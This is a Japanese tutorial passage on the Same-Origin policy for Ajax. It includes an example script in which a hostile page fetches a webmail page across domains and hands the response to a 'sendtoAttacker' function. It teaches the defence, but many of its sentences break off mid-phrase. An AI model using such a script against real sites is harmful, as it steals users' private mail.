Same-Originポリシー
第2回はAjaxに関するセキュリティモデルを紹介します。第1回で紹介した,
Ajaxを使い通信を行う部分は次のように記述しました。
req.open('GET', 'http://www.example.com/contents.txt');
このURLの部分を,
これはセキュリティ上の理由から,
Same-Originポリシーの必要性
それではなぜSame-Originポリシーが必要なのかを理解するために,
ユーザはWebメールを提供しているサイトにログインし,
ユーザはメールを読んでいる最中に用事を思い出し,
このときwww.
リスト1
<script language="javascript">
var req;
if( window.XMLHttpRequest){
req = new XMLHttpRequest();
}else if(window.ActiveXObject){
try {
req = new ActiveXObject("MSXML2.XMLHTTP");
} catch (e) {
req = new ActiveXObject("Microsoft.XMLHTTP");
}
}
if (req) {
req.open('GET', 'http://mail.example.com/mail/index.html'); // (3)クロスドメインアクセス
req.onreadystatechange = function() {
if (req.readyState == 4) {
sendtoAttacker(req.responseText); // (4)取得した情報を攻撃者のサーバへ送信
}
}
req.send(null);
}
</script>
するとWebメールのサイトにリクエストが送信されます。…(3)
その結果,
その後,
このように,
実際にはクロスドメインアクセスは禁止されていますので,
なお,